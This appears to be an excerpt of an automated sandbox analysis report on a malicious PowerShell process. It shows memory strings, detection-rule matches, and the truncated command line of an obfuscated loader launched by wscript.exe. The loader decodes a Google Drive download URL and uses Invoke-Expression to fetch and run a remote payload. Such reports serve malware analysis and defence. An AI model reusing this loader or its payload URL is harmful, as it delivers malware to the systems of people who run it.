Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.Management.Automation.pdb2 source: powershell.exe, 00000001.00000002.1809922936.000001FF75D2C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.Automation.pdbiTP)l source: powershell.exe, 00000001.00000002.1824372929.000001FF75F84000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1810470481.000001FF75F20000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: lib.pdb{Yy source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n.pdbz source: powershell.exe, 00000001.00000002.1810470481.000001FF75F5E000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ll\System.Core.pdb~YD source: powershell.exe, 00000001.00000002.1808945712.000001FF75C8D000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB24000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FAE6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5F936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJXP |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE3D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE3D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1kXTNaoxLJphfcAVSlYxVolD7HuHhKCJX&export=download |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5ECD1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: amsi64_7348.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(6)){$anthracolithic+=$Roadless.$civilisationen.Invoke($Kuldeblgerne, $Spiritusestes);}$anthracolithic;}function Multiplikatorernes($Fngsledes){. ($Tythed) ($Fngsledes);}$unlogged=Ulnage '.ceanMSkalaoB silz An.oiTimeblRadiolBevisaUnflu/Broom5Cacod.Engen0Ba.dh oplsn(Bu,gaWEnligiBilspnEmiredDatafo r,mow Unins oilo Kab.lNSalonTBr.kk Anac1 lom0 Kret. litu0Plagi;Total Ing.aWViz.ri egalnCarci6F,ske4C rru;Robus bidrax Grou6,kaer4arve ;Ek,am Fodfsr Luntv bene:Heme,1 T,lm2m end1Maend.Progr0 un.e)Predr TranGPlatfeEkspacSpr skCreamo tect/ Stan2Vask.0 Midw1 Lecy0Opskr0Perso1 Tilr0Eksam1etabl Ka.keFInteri Rgelr LucieknoerfAssobo F.rtxEleme/Esthe1Nnned2Allia1Anmel.Frede0Galip ';$Zootechnician=Ulnage 'UbrudUBermusKo,ere,kiderBusti- TramAamitigGgerdeWeaponBe,tmtConv ';$Blikdaases93=Ulnage ' .etrh necttGrimitKashipJustssSnerp:Manaf/ udbl/i ddadfarverInkasiDegorv,xploeM,sra..kyftgCapo oFantooGuigngA.tralBlk peAller..ntrac Subdo Cha mElpid/ElenduTailocrek.m?censueContexFemetpVebogoBill.rChastt Form=Asymmd Fun.oMikrowtransnVirtulForstoFoliaa Syklda aly& Railiabri dTilfa=Overf1 PolykcozenXGreteT ndemNPr.staRotato EftexDoeglL SeklJHypotpBruskhWoodbfRetracS.indA Sa.mV ChucSO.ymplDataeYDise.x Nyt.VPersooUdloelIn.erDOv.rs7,alelHEnleauUndubHEnleah BuksKBimleCalarmJForv.XVidsy ';$Timbalernes=Ulnage 'Pa,ie> Read ';$Tythed=Ulnage ' vermist,tset,lsjxTyde. ';$Conidium='Historicize';Multiplikatorernes (Ulnage 'P,psiSVlteneSlnggtMeteo-Filr C Wil oKlaptn Lym.tReinseZincenmyliut Fu.d Hemic-SpiseP N.nraP.robtChickh.onde ugenTOp ev:Retab\SydafV RummiPsychcRettea .amirStrmp.Kro.stB,bylxUpliftLed n A.rom-BiogrVCaramaTekstlSer,iuPelseeDingt Dy de$RulleCMa ero SeminImpliiRampidletpai Gn.du spanmV.jto;.nher ');Multiplikatorernes (Ulnage ' hizaiU skifunme, twelv(Est at Dekoe ngodsSjlert micr-TomatpengjaaTingetCharthBusre AakanTBaloc:Boghy\LandzVFumeriPremoc Ko,sasitcor,alsa.SwotttAftgtx Casit Depo)Forbr{D.mpveGeorgxNeuroi EscatRest.}Bermm;Ptsa, ');$Germind = Ulnage 'Cledge SwatcSwingh Strao.deli Trin%Backsa PincpKlamppBelbsdKvadraReflet Mi maVolut%Sqush\De,erSG mmioForetmAmplieArchesBol,gtRemsehMicr.eFejl sInconiSpi |